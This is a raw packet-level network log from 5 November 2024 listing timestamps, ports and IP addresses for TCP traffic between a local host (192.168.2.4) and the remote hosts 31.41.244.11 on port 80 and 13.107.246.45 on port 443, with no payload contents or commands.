Nov 5, 2024 18:46:08.957954884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957969904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.957972050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957998037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958014011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958033085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958074093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958102942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958112955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958134890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958143950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958143950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958173990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958268881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958278894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958288908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958300114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958309889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958311081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958318949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958327055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958353996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958394051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958404064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958412886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958424091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958435059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958436012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958446980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958470106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958525896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958535910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958547115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958555937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958570004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958575010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958585978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958600998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958611965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958636999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958647966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958658934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958667040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958705902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958705902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958753109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958894968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958925962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958935022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958935022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.958960056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.958982944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959008932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959021091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959022045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959032059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959041119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959057093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959073067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959121943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959132910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959141970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959160089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959183931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959187031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959194899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959201097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959223986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959252119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959341049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959351063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959359884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959368944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959378004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959378958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959387064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959400892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959405899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959410906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959417105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959443092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959449053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959455967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959486008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959573984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959583998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959594011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959603071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959613085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959615946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959631920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959650993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959697962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959707975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959717035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959726095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959736109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959741116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959762096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959774971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959851980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959867001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959877014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.959893942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.959908009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979279041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979289055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979299068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979324102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979335070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979373932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979398966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979404926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979414940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979425907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979434967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979446888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979448080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979470015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979471922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979480028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979491949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979504108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979523897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979549885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979558945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979567051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979597092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979613066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979634047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979650021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979660988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979685068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979741096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979752064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979760885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979770899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979779959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979789972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979803085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979837894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979866028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979876041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979883909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979896069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979923964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979933023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979938030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979938984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979947090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.979965925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.979984999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980011940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980022907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980032921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980071068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980089903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980102062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980129004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980139017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980168104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980182886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980248928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980258942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980264902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980273962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980283022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980335951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980339050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980349064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980357885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980382919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980396986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980415106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980426073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980434895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980467081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980478048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980485916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980535030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980573893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980578899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980588913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980603933 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980633974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980664015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980674028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980681896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980691910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980779886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980786085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980796099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980804920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980813980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980865955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980869055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980876923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980901957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980916977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980926037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980962038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.980988979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.980999947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981036901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981060982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981067896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981071949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981106997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981120110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981121063 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981131077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981173038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981214046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981225014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981235027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981246948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981257915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981261969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981271029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981281042 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981295109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981321096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981328964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981338024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981352091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981372118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981408119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981424093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981434107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981443882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981472015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981503963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981534004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981544971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981558084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981568098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981578112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981587887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981587887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981623888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981631994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981653929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981663942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981674910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981690884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981744051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981755018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981767893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981777906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981786013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981789112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981796980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981807947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.981816053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981817007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981842995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.981870890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.028918982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.028928995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.028938055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.029017925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.029058933 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.074161053 CET	443	49812	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.074512005 CET	443	49812	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.074582100 CET	49812	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.074637890 CET	49812	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.074637890 CET	49812	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.074661970 CET	443	49812	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.074678898 CET	443	49812	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.077414989 CET	49817	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.077445030 CET	443	49817	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.077517033 CET	49817	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.077651978 CET	49817	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.077667952 CET	443	49817	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.078958988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.078979015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.078990936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079016924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.079027891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.079102039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079113960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079130888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079139948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079154968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079155922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.079164982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079169035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.079201937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.079268932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079278946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079340935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.079509020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079529047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079540014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079560041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.079583883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.079952955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079971075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.079981089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080001116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080012083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080029964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080039978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080049038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080069065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080097914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080177069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080187082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080197096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080209017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080219984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080219984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080233097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080238104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080246925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080262899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080291033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080291033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080326080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080408096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080415964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080418110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080427885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080439091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080445051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080447912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080459118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080466032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080487967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080497980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080501080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080508947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080538988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080538988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080550909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080616951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080626965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080636024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080645084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080653906 CET	80	49804	31.41.244.11	192.168.2.4
